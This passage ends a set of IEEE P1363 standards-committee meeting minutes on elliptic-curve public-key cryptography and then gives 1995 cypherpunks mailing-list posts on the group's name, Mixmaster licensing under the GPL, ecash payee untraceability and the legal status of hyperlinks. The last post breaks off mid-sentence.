   *Michael Markowitz
   *Alfred Menezes
   *Mark Oliver
    Paul Van Oorschot
    Minghua Qu
   *Roger Schlafly, Secretary
    Sherry Shannon
   *Jerry Solinas
   *Scott Vanstone
    Michael J. Wiener
    Harold M. Wilensky
    Roger Zuccherato

Those marked with an asterisk were qualified to vote, having also
attended 2 of the last 3 meetings (and thus 3 of 4, including this
one).

Motion 1: (Arnold, Kennedy) The agenda is approved.  Passed, unanimously.

Motion 2: (Arnold, Markowitz) Approve the minutes.  Passed, unanimously.

Kaliski reported that he is still trying to get registered OID numbers
for us, but it will take the IEEE another six months to get its act
together.  We can proceed on the assumption that the numbers will be
filled in later.

Kaliski reported that the IEEE is setting up a web site to store drafts
of standards online.  The address is http://stdsbbs.ieee.org.  When we
(and IEEE) are ready, we will set up an area for our drafts.  We can
limit who can upload and download if we wish.

Motion 3: (Oliver, Arnold) Make online documents publicly accessible
to anyone.  Passed, unanimously.

Kaliski will set up a P1363 area on the SPA server, as soon as it is
feasible.

The other officers had nothing to report.

Kaliski gave us a patent update.  We still don't have the necessary
assurances.  One difficulty is the lawsuit between Cylink and RSA Data
Security which may drag on for a while.  There is also an arbitration
proceeding between the two companies, with a ruling expected in a few
weeks.

The application for a waiver from the IEEE patent policy is still
pending.  Schlafly suggested amending the application letter to
limit the waiver to the Stanford patents on the theory that the
situation with the Stanford patents is more likely to be resolved
in the near future.  (Among other things, the Stanford patents
expire much sooner than the MIT RSA patent.)  When support for this
position was weak, he
proposed amending the application to make it clear that there is
a stronger case for a waiver on the Stanford, so that if the IEEE
chooses to reject our broad request, they will at least know that
we could live with a narrower waiver.  Others argued that a broad
waiver gives our committee maximum freedom, and that we could
decide later the extent to which we take advantage of the waiver.

Motion 4: (Kennedy, Oliver) Leave waiver request as is.  Passed, 7-3.

Arnold raised the issue of the removal of a private key syntax from
the elliptic curve draft.

Motion 5: (Arnold, Gilmore) We introduce a representation of private
keys into the standard.
Passed, unanimously.

Motion 6: (Arnold, Markowitz) Archiving and protecting private keys
is outside our scope, and we should not include it in the body of
the standard.
Passed, unanimously.

This motion leaves open the possibility of having advisory material
on archiving private keys.

This issue also provoked a discussion of syntax alternatives to
ASN.1.  Ellison argued that ASN.1 has a corrupting influence on
the mind, and should be scrapped altogether.  Kaliski said that
there is no actual requirement that we use ASN.1, and that we
could just use bit strings if we wished.

No new sections were proposed.

The next meeting was scheduled for the Crown Plaza hotel in Toronto,
on Nov. 15-16, in conjunction with the Public Key Solutions (PKS)
conference sponsored by Mobius.

We discussed having the following meeting in conjunction with the
RSA Data Security conference.  That conference is at the Fairmount
hotel, San Francisco, Jan. 17-19.  Another possibility is in conjunction
with ISOC in Feb. 22-23 at San Diego.  Either way, the P1363 would
probably be the two days before.  We were unable to reach a consensus,
so we deferred the issue to the next meeting.

Markowitz assumed to role of treasurer again.  The meeting fee was
$60, or just $25 if only attending one day.  Money for the dorms was
also collected.

At the request of the IEEE editors, we are moving our documents to
Microsoft Word format.

Our outline is now as follows.

1. Overview, scope, purpose
2. Standards references
3. Definitions
4. Elliptic curves
5. Bibliography

Appendices
A. Mathematical background
B. Supporting algorithms
C. Test vectors
D. Known state of attacks
E. Random numbers
F. Hardware support

Arnold expressed doubt as to whether the hardware support section
was going to come together satisfactorily.  So we changed the name
of that section to "Other considerations" so that we could include
other miscellaneous remarks.

Ellison took over the random number section.  He wanted to ditch
some of the randomness tests as not being strong enough, and include
some other explanatory material.

At 3:00 we took a break until 3:35.

The rest of the meeting was devoted to a detailed discussion of
the elliptic curve draft.  Menezes handed out a new copy.

Solinas handed out a paper on elliptic curve point counting, to be
included in appendix B.  It gives a nice way of choosing a curve with
a predictable number of points.  To make it more complete, he will
add a couple of references, particularly to the forthcoming CRC
handbook of applied cryptography, by Menezes, Van Oorschot, and
Vanstone.

Vanstone suggested switching the elliptic curve spec to multiplicative
notation.  Mathematicians prefer to use an additive notation because
the curve is an abelian group.  However, it is very confusing for
cryptographers because the formulas are analogous to Diffie-Hellman
and Elgamal protocols where the principal operation is multiplication
in Zp.

Motion 7: (Kennedy, Menezes) Stay with additive notation for elliptic
curves, for consistency with the mathematical literature.
Passed, unanimously.

For various reasons, we decided that n, the order of the elliptic curve
base point, should be required to be prime.

Someone also thought "G" was better notation for the base point.

Kaliski questioned the block splitting scheme in the ECES.  Kennedy
said it scored high on the hokey meter.

At 9:10 Friday morning, the meeting resumed.

The treasurer reported collecting $1662.70.  This included $538.85
for dorm rooms and $1125 in IEEE fees.  Kaliski demonstrated a
cryptanalytic attack on these totals, as a way of verifying them.

Vanstone gave an explanation of ECES.  One rationale for the block
splitting scheme is that a typical elliptic curve uses 160 bits for
each of x and y.  A triple DES key is 168 bits.  A straightforward
scheme would only use x, and thus not be able to encrypt the whole
triple DES key.  Using y would give 320 bits, but y is (nearly) a function
of x, so there are some cryptographic subtleties in using y directly.
In the end, we weren't that comfortable with it, so we decided
to stick with a simpler one-block scheme.  The simpler scheme just
multiplies (or perhaps xors) the message by x.

We took a break at 10:45.

There was more criticism of ASN.1.  Ellison offered to construct
some simple data representations which would allow us to avoid
ASN.1.  Kaliski suggested that an elliptic curve point (x,y) with
possible compressed y could be represented by

        [ x bytes ]  00
        [ x bytes ]  01
        [ x bytes ]  80  [ y bytes]

That is, the last line is for the full x and y.  If y is compressed
down to one bit, the first or second line is used.

Kaliski argued against the signature schemes directly referencing
a hashing operation.  Someone may want to sign something other
than a hash value.  An implementation may want to conform without
having a hash function built-in.  Solinas objected that there
are risks to signing data other than hash values.  This issue
was not resolved.

Solinas complained that there are various parameters buried in
the draft without any indication as to how these are related to
overall security.  He volunteered to write some notes on how
the various parameters were related to each other.  How these
are incorporated is to be determined.

Someone pointed out we should check r = 0 or s = 0 in the signature
schemes.

At 12:20 we took a break for lunch, until 1:45.

Vanstone gave a talk and handout on key agreement protocols.
He showed how he and Menezes found weaknesses in other Diffie-Hellman
type protocols, and they proposed a new one that overcomes
the problems.  We all liked it.

We thought q and n should be part of the system parameter setup.

There was some discussion of optimal normal bases versus using
an irreducible polynomial.  We also discussed advantages of restricting
to p = 3 mod 4, and to curves with a = -3.

At 3:20 we took a break until 3:30.

Ellison handed out some introductory material on random numbers that
he wrote since taking over the job the day before.

The plan now is to have a draft standard at the next (Nov.) meeting,
and then to polish it up for ballot at the following meeting.

We adjourned at 4:20.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 15 Sep 95 12:15:22 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <9509151915.AA16093@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



Tim writes:

>Indeed, some people here have been calling themselves by various names
>("CypherGeek," "Crypto Rebel," etc.) for a long time. Personally, I despise
>the terms "geek," "dweeb," and "nerd," and think anyone who calls themselves
>by these insults is not "reclaiming and deconstructing the labels of the
>oppressor class," as the slogan goes, but is merely insulting themselves.
>Blacks who call themselves "niggers," homosexuals who call themselves
>"queers," and computer programmers who call themselves "geeks" and "dorks"
>are all playing the same game.

I fail to see how you can write this, and then claim it's OK to call
yourself a 'punk'.

>A better approach is for the "conservatives" who want a "more conservative"
>name to simply do what I suggested: form a new group and name it what they
>like. They wouldn't have to quit this list, they would just be able to
>cleanly recruit for their new list.

>Seems simple to me. And honest. And less devisive than trying to change the
>name of a group with a long history (by modern standards) and with several
>well-known achievements.

Who is trying to be dishonest, and what are they trying to be dishonest
about? I'm really confused by this.

Tim, I don't want to take your toy away, or minimize the acheivements
of the cypherpunks (among whom I somewhat presumptively include myself).

OK. Let's NOT drop the term 'cypherpunk'. However, I do think we need to
have available another term for 'people with our interests' if we're
going to have maximal effectiveness.

What follows is my original followup, written last night.

- ---------------------------------------------------------------

    I've gotten a number of responses to my post 'Cypherpunk considered
harmful." It's pretty clear that a lot of people did not really
understand what I was getting at. This is my fault. I'll try to clarify.

    What is the situation on the ground, here in mid September 1995?

    It's utterly clear that the US and other  governments, are dead set
against the widespread use of strong, unencumbered crypto. 'They' are
using many different (and weak) pretexts to delay or prevent it's
incorporation into commercial software. 

    If there is a hidden state agenda, 'our' belief is it is that the
state wishes to retain it's current ability to spy unseen on the
citizenry, wiretapping with or without warrents, and examine stored
information without the cooperation of the owner. 

    The general 'cypherpunk viewpoint', if I may generalize, is 
diametrically opposite: It's not really a hidden agenda, since 
frequent rants make it pretty clear. 

    Since we're not a unified command and control system like the state,
different cypherpunks have different goals, but I hazard that most would
agree with:

    'Strong, uencumbered cryptography is an empowerment tool for the 
electronic age; it strengthens the individual in relation to the state,
allowing him (or her) to communicate privately, and store his data as
securely as if it resided in his own head. The widespread use of strong
cryptography will lead to social changes that we regard as desirable.'
     
     If you accept this arguably paranoid vision of our situation, then
it's clear that we are in a battle for the hearts and minds of the
people: 

     The State wants to convince people that their safety and 
prosperity lies in trusting Big Brother to watch over and take care of
them, and nothing but danger lies outside of BB's line of sight. 

     The cypherpunks take a much more libertarian viewpoint; that the
state is already too strong and intrusive, and that  cryptography will
not only allow us to engage in commerce and protect ourselves against
crime, it will also allow us to act outside of improper state control.

     But time is running out. 

     All the state has to do is convince people that strong unescrowed
encryption is needed only by criminals - if you trust the state, there
is no reason to object to it being able to listen in - after all, all
laws are reasonable, and the state won't listen in without a warrant.

     'We' have a harder task. We need to convince people that they need
encryption - it will protect us against criminals, snoops, and hackers,
and the state's proposals will not do this. It's a much more subtle
thesis, without the easy emotional hooks that can be exploited by the
state to promote it's position.

      I don't think we can turn people into libertarians, and then get
them to adopt cryptography to protect themselves from the statists. At
least, not enough people to count in the short term, and the short term
is where we need to focus at the moment.

      I *do* think we can persuade people that they need cryptography to
protect themselves against criminals, and that the governments proposed
standards for key length limits and key escrow will make the crypto so
weak and insecure that it will cause more crime than it will prevent.

      That's a critical point - that the individual can, without
difficulty, use cryptography to protect him or herself against criminals
more effectively than he could by relying on the state.

     The memes we want to propagate are 

1. "I need strong unescrowed cryptography to protect myself against
criminals."

     If we can convince a large portion of the population of this (and
we have truth on our side), we'll be well on our way.

2. "The government's initiatives on encryption, while they may be
well-intentioned, are worse than useless, and will endanger me and my
loved ones."

     If we can get this through the public's collective head as well,
we'll have won the battle.


     This goal is where the 'cypherpunk considered harmful' title comes
from. I want to propagate these ideas.

     If I go up to an average person and tell them "The State is working
to ensure that it can spy on your every communication, and can't be
trusted to follow it's own rules for doing so. Use cryptography to help
promote cryptoanarchy!", he will usually dismiss me as a nutcase.

     If I say "Criminals and hackers can tap your internet
communications, defraud your cell phone account, eavesdrop on your
calls, impersonate you, steal your credit card numbers, and spy on your
business secrets. I can tell you how you can easily prevent this", then
he is interested, and wants to know more.

     Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
nutcases for many people, and are a barrier to getting our ideas
across. I'm not saying this pigeonholing is correct - in fact I despise
people who judge a book by it's cover, but so many people DO make such
snap judgements that we need to take this into account when talking to
the general public.

     For those who have responded, *I* do not have a problem with the
term cypherpunk. However, I know that there are many people who do, 
people we want on our side. 

     I propose that in communicating with the cryptographic laity, we
should be emphasizing the anti-crime aspects of crypto, as well as it's
enabling impact on commerce and the American software industry. 

     We'll get a lot more converts with this approach than we would by
emphasizing the political aspects of cypherpunk, no matter how important
we think they are.

     Think about it. Which future would you rather see:

1. Lots of people demanding strong unescrowed crypto for what you  
   consider rather peripheral and politically unaware reasons, which
   you have educated them in.

2. Unescrowed crypto banned, with those who promote considered
   aiders and abeters of the four horsemen, (but boy are they 
   ideologically pure!).

Peter Trei

I probably won't see any responses till Monday. I'm going for a 
weekend at a resort on Lake Winnipesaukee. If you need me, I'll be
in the hot tub. :-) 

     





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFmmK1QxhKXe9s8VAQE+tgP+NcKdGvBeJpa8AHGr/RhKCHudZP2qmRNP
J699UCCvN006ywIjurjuis48VPj26uxBkcRbeuzNxGlKmZqXIkS0vEcFjrrZhBsK
V9dLFFGTZ6JG3nK++mleW1wQB/F0azXXvXKJWa6R+Tnj1oo2ADUxGNQMs9IVmgR3
zsyK3fej+IQ=
=YqDH
-----END PGP SIGNATURE-----

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Fri, 15 Sep 95 15:34:56 PDT
To: greenbes@netcom.com (Steven Greenberg)
Subject: Re: CYPHERPUNK harmful.  THE TRUTH IS TOLD
In-Reply-To: <Pine.3.89.9509151414.A23653-0100000@netcom>
Message-ID: <199509152231.PAA07080@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Steve says:
> Hmmmm... If memory serves, a year or so ago there was just such a schism
> when a prominent cypherpunk split off and formed the "cypherWONKS" list. 
> The failure of that list can be attributed to one thing and one thing
> alone: a concerted effort by YOU and your acolytes against it.

EEEK,
"cypherWONKS" sounds to me like someone working for Bill Clinton.
I believe that Bill and Hillary are the only people that I have
heard use this WONK term.  Even they didn't like WONKS.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 15 Sep 95 12:48:28 PDT
To: mix-l@jpunix.com (Mixmaster Mailing List)
Subject: Commercial Mixmaster (was Re: Mixmaster status)
In-Reply-To: <ac7edf5800021004fd74@[137.110.24.250]>
Message-ID: <9509151948.AA27938@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes:
# Consider this scenario ...  Mixmaster get's bought by the Acme
# Crypto Company of Ft. Meade, MD.  They "improve" it, and offer a new
# version.  It's even FREE (for non-commerical use)!  But their
# "improvements" make it incompatible with previous versions, and so
# you have to upgrade.  The new "commercial" version comes with no
# SOURCE CODE, of course...

Lance Cottrell writes:
> 4) There will always be a free version of the client with source code.
>
> While I have not discussed it, I can not imagine that there would not also
> be a free version of the server code (with source). Without remailers what
> is the point of the client software?

Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do,
I suspect he may not have much legal leeway in this regard.

With the caveat that I Am Not A Lawyer, it seems to me that the GNU General
Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or 
http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant 
distributions of Mixmaster, has some significant implications for any
commercial development of Mixmaster. It's applicable to "the Program or any 
derivative work under copyright law: that is to say, a work containing the
Program or a portion of it, either verbatim or with modifications and/or
translated into another language". 

The GNU GPL specifies that:
	
 	2. You may modify your copy or copies of the Program or any portion of
	it, and copy and distribute such modifications under the terms of 
	Paragraph 1 above, provided that you also do the following:
	[...]
	b) cause the whole of any work that you distribute or publish, that
    	in whole or in part contains the Program or any part thereof, either
    	with or without modifications, to be licensed at no charge to all
    	third parties under the terms of this General Public License (except
    	that you may choose to grant warranty protection to some or all
    	third parties, at your option).

and that:

	3. You may copy and distribute the Program (or a portion or 
	derivative of it, under Paragraph 2) in object code or executable 
	form under the terms of Paragraphs 1 and 2 above provided that you 
	also do one of the following:
 	a) accompany it with the complete corresponding machine-readable
    	source code, [...] or,
	b) accompany it with a written offer, [...] to give any third party 
	free (except for a nominal charge for the cost of distribution) a 
	complete machine-readable copy of the corresponding source code, [...]

So it looks to me as though Mixmaster source code will continue to be 
legally available, no matter what....

Better informed interpretations are enthusiastically solicited.
 
-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Fri, 15 Sep 95 16:10:40 PDT
To: cypherpunks@toad.com
Subject: Re: why ecash is traceable
Message-ID: <199509152249.PAA18059@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal & Tim have made some interesting comments about payee untraceability.
I suspect it will clarify things to point out the orthogonality in 
two of the major design choices:

* Clearing: Offline vs. online
* Settlement: Deposit to payee's account vs. sending new cash to payee

Because DigiCash wants their product to have payer, but not payee, privacy,
the current ecash(tm) software from DigiCash uses online clearing
and deposit to payee's account, but the three other combinations are 
also quite doable if somebody wanted to implement them.  The design that 
allows symmetric untraceability combines online clearing with sending new 
cash.  This way the bank need not ID the payee Bob in order to credit 
him with the value of the transaction; Bob and the bank can complete 
the clearing and settlement via anonymous channel.  (The bank will 
also want to receive an anonymous payment from Bob for the service,
and Chaum has described a second blinding step the payee must
perform for the symmetric case, complications which I won't go into 
here).

Offline clearing requires the potential to ID the payer in 
order to punish double-spending after the fact.
Online systems without observers (such as ecash(tm)) don't
need to worry about trying to find multiple spenders, because this is
prevented by the online clearing.  In fact, purposeful second-spending
is used to recover from some error conditions, specifically to determine 
whether the payee in fact received the "coin" or not when there has been a
network error in the middle of a transaction.   Distinguishing between
mistaken  and fraudulent double spending is a very complex, not completely 
tractable problem, so the current ecash(tm) punts it, which is reasonable
because it is online.  An offline system would need an elaborate
blacklisting system as well as active support of law enforcement in
all jurisdictions using the ecash, would need to come up with 
reasonable ways to distinguish between fraudulent and 
mistaken double-spending, and would need more elaborate and 
specialized error-recovery protocols.  If hardware "observers", based 
on "tamper-proof" hardware instead of mathematical protocol, and which
prevent double-spending at the source, can be made harder to crack than
the maximum a cracked card is allowed to spend, then such small-value 
transactions might be feasible offline.  (This is the major avenue being 
pursued commercially, because online transactions are perceived to
be too expensive, which is false in the case of the Internet IMHO).

Nick Szabo					szabo@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Fri, 15 Sep 95 13:36:37 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <199509152013.QAA18005@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Peter Trei <trei@process.com> wrote:

>      Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
> nutcases for many people, and are a barrier to getting our ideas
> across. I'm not saying this pigeonholing is correct - in fact I despise
> people who judge a book by it's cover, but so many people DO make such
> snap judgements that we need to take this into account when talking to
> the general public.

Two of the responses to the "An opportunity..." post unapologetically
admitted that they refused to read the text of the message due to the
presence of the word "cypherpunk" in the first sentence.

Shows you what we're up against.

BTW, I'm not for changing the name of the list, but I do see the logic
in a more establishment-friendly name to use when lobbying the public.

David C. Lambert
dcl@panix.com
(finger for PGP public key)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFneAqpplsfgM88VAQE+5wP9GZrIoComyFDeQ6brTLJwZ2oamry3IfC7
XhlqMlAZnC2b1w521nm085nZKtO9/Ru9Fw3BllPinG8nGcBggr9zkH4Ba+Zbezh0
FKK29d7wFGQz1d5JfyYCZhl4dTBdbpnU4jd5Rb27XtvP9livAeR/HIwNAJMccSCX
qO/kxlVRRZg=
=1Lxr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 15 Sep 95 14:33:57 PDT
To: tcmay@got.net
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <199509151834.LAA07925@comsec.com>
Message-ID: <9509152030.AA16183@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>>To:cyberia-l@warthog.cc.wm.edu
>>From:tcmay@got.net (Timothy C. May)
>>Subject:Linking = Showing = Transferring?

>>_Linking_ is effectively _showing_, given the point-and-click mechanics of
>>hypertext. This is a situation anticipated by authors (e.g. Ted Nelson),
>>but is now coming to the fore.
>>
>>Granted, providing a link is not the same as actually _including_ the
>>material the link points to, but it is very, very close. Arguably, the
>>same.

There are two important differences.

The first difference is in ownership of the data.  If the source of the
link decides to clobber the file, then the fact that I have a page with the
URL does not guarantee access to that file for the user of *my* page.
Similarly, the person owning the file can freely change the content of the
file, without my changing the URL which points to it.

The other difference is in handling of the data.  If the link were to
a pornographic image and someone were to access it through my page's URL,
the bits of that image would never touch my computer.

Meanwhile, <a href="http://dcs.ex.ac.uk/~aba/rsa/"> RSA encryption system
in PERL </a> might be a URL which violates US export laws -- if this
interpretation were to be taken -- but if so, does it violate them in this
mail message?  That depends, I suppose, on whether your mail agent is aware
of URLs and turns them into point-and-click units.  Is it a violation if
the URL is printed in a paper magazine?  After all, it's the convenience of
the web browser which is at issue.  One can invoke netscape with or
without a parameter.

Yes -- interesting legal times ahead.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFniL1QXJENzYr45AQFlYAP8DGHGk6EEmHXyPbeA7hoZjQ1pkEiyW2xB
1srFbXVsdJt9cwNQbBmFSfKARKVOnh1f+rEEqFZEwXXS1BbwlSljDz/hykZwfQwv
h1kXPvJ9MMqleg6y8IXM5nTL9lKnq+ThKmgl/aciDYZqZ009IL4ssb81gUA5r5lC
mYkfhqulWsU=
=AYRX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 15 Sep 95 14:38:20 PDT
To: mix-l@jpunix.com
Subject: Re: Commercial Mixmaster (was Re: Mixmaster status)
Message-ID: <9509152138.AA02721@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> With the caveat that I Am Not A Lawyer, it seems to me that the GNU General
> Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or 
> http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant 
> distributions of Mixmaster, has some significant implications for any
> commercial development of Mixmaster. It's applicable to "the Program or any 
> derivative work under copyright law: that is to say, a work containing the
> Program or a portion of it, either verbatim or with modifications and/or
> translated into another language". 
> 

Most common mis-understanding about the GPL.  If you GPL
something, *you* hold the copyright to the material, and
can still do anything you want with it.  See Perl for a good
example - released under an artistic license and under GPL.

GPL prevents *others* from making distributions without
distributing the source code.

Of course, if you accept GPL'ed patches to your code, the
whole thing gets messy, as now you can't claim complete
ownership of the entire code base.

I have simplified this - go to gnu.misc.discuss for a complete
rehash of this subject every 2-3 weeks.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 15 Sep 95 14:07:01 PDT
To: dcl@panix.com (David C. Lambert)
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <199509152013.QAA18005@panix.com>
Message-ID: <9509152105.AA18280@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


David C. Lambert writes:

> Peter Trei <trei@process.com> wrote:
> 
> >      Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
> > nutcases for many people, and are a barrier to getting our ideas
> > across.

> Shows you what we're up against.
> 
> BTW, I'm not for changing the name of the list, but I do see the logic
> in a more establishment-friendly name to use when lobbying the public.

How about "civil libertarian" then?


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 15:09:43 PDT
To: rishab@infinity.c2.org
Subject: Re:  "Use implies consent to monitoring"
Message-ID: <9509152208.AA09221@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


`h
>   Please be advised that use constitutes consent to monitoring

Use of what?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 18:20:21 PDT
To: cypherpunks@toad.com
Subject: Re: why ecash is traceable
Message-ID: <ac7f73e511021004d581@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 PM 9/15/95, Nick Szabo wrote:
>Hal & Tim have made some interesting comments about payee untraceability.
>I suspect it will clarify things to point out the orthogonality in
>two of the major design choices:
>
>* Clearing: Offline vs. online
>* Settlement: Deposit to payee's account vs. sending new cash to payee
>
>Because DigiCash wants their product to have payer, but not payee, privacy,
>the current ecash(tm) software from DigiCash uses online clearing
>and deposit to payee's account, but the three other combinations are
>also quite doable if somebody wanted to implement them.  The design that
>allows symmetric untraceability combines online clearing with sending new
>cash.  This way the bank need not ID the payee Bob in order to credit

Thanks, Nick, for summarizing this clearly in terms of these two axes. This
symmetric untraceability is what I was getting at with my point about Bob
clearing the transaction and getting back blinded cash. It's apparent that
if Alice can get untraceable cash, and she tells her bank to go ahead and
give the same kind of untraceable cash to Bob, then Bob can also get
untraceable cash.

....
>Offline clearing requires the potential to ID the payer in
>order to punish double-spending after the fact.

Offline clearing has many hurdles to overcome, and this "True Name" (ID)
issue is not very attractive. Fortunately, the vast increases in Net speeds
are on the side of online clearing, even for relatively small transactions.

>Online systems without observers (such as ecash(tm)) don't
>need to worry about trying to find multiple spenders, because this is
>prevented by the online clearing.  In fact, purposeful second-spending
>is used to recover from some error conditions, specifically to determine
>whether the payee in fact received the "coin" or not when there has been a
>network error in the middle of a transaction.   Distinguishing between
>mistaken  and fraudulent double spending is a very complex, not completely
>tractable problem, so the current ecash(tm) punts it, which is reasonable
>because it is online.  An offline system would need an elaborate

Sounds pretty compelling to me to concentrate on online clearing systems....

I can imagine limited needs for offline clearing, such as road toll
systems, or parking tokens, etc. The amounts of money there can be somewhat
limited, and the implications of double spending revealing identity are
less serious. (Though I can imagine a worrisome scenario where a highway
toll system "deliberately double spends" received tokens to track
motorists...there may be precautions built into such systems that I just
don't know about.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 18:27:20 PDT
To: Steven Greenberg <greenbes@netcom.com>
Subject: Re: CYPHERPUNK harmful.  THE TRUTH IS TOLD
Message-ID: <199509160125.SAA26600@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Hmmmm... If memory serves, a year or so ago there was just such a schism
>when a prominent cypherpunk split off and formed the "cypherWONKS" list. 

:-) :-)  And starting a new list lets us decided on a new LOGO to replace
that old tacky rose-and-bits thingy :-)

Cryptographic Professionals for Social Responsibility
Cryptographic Industry Association
National Steganography Alliance
Cryptographers for Foreign Reflexivity
Extremely Private Institute for Cryptography
NII Institute of Cryptography
American Cryptographic Legal Union
Free Banking Institute
Cryptographic Defense Taskforce
Cryptographic Organization for Privacy and Security
Entropy, Steganography, and Cryptography Research Organization for Women

(If anything, what we need is a way to separate the technical/mathematical
discussions from rants like this, but any time we get the list focused
on mostly technical issues, the government goes out of its way to do
something egregiously stupid or offensive...)

Somewhat more seriously, though, there are times that it's useful to have
a more respectable-sounding organization (or at least a letterhead...),
that's open to participation by members and not just directors (which has
been some people's concern about the EFF, CDT, EPIC, and maybe TAP or CPSR.)

If none of those are respectable/accessible/non-socialist enough for you,
and the
British Cryptographic Privacy Association (or whatever their name was)
can't be found or sounds too much like International Outside Agitators,
and the various academic groups are too busy being academicly respectable
to do political agitation ("CryptoAcademics Write Papers!"),
then come up with a name and a Postscript letterhead, and start an
email list that you can gateway to cypherpunks (as long as you can
prevent duplications or mail-floods.)  If the main goal is to have a calmer
name and mostly the same activities, an alter-ego mailing list is one approach.

#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 15:48:04 PDT
To: mix-l@jpunix.com
Subject: Re:  Commercial Mixmaster (was Re: Mixmaster status)
Message-ID: <9509152246.AA09283@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Better informed interpretations are enthusiastically solicited.

Lance owns the code.  He can take it, strip off the copyright, and
transfer all rights to Bill Gates for a million bucks.  He cannot,
however, rescind the copyright or licenses that he has previously
given out.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 15 Sep 95 15:53:21 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK harmful.  THE TRUTH IS TOLD
Message-ID: <v02120d00ac7fab9d3ccc@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Hmmmm... If memory serves, a year or so ago there was just such a schism
>when a prominent cypherpunk split off and formed the "cypherWONKS" list.
>The failure of that list can be attributed to one thing and one thing
>alone: a concerted effort by YOU and your acolytes against it.  You refuse
>to even mention this, which is all the proof any open-minded person needs.
>Now you are trying to stifle all open debate by doing it again. So, Mr.
>May/Szabo (if that IS your name), why not come clean once and for all
>about your role in the deaths of Vince Foster and Randy Weaver's wife, and
>your part in the newly-emerging administration scandal: TENTACLE-gate.

Yeah!!!!  What he said!!!!

Seriously.

It seems to me that if a list of cypher-interested "cryptologists, hackers,
and mathematicians" (Copyright, Wall Street Journal), want to call
themselves "punks", it's fine by me.

Face it folks, people of the "punk" genre have innoculated this particular
petri dish. There's enough information-agar to munch on here for quite a
while, so it doesn't look like we're going to go anywhere. If some members
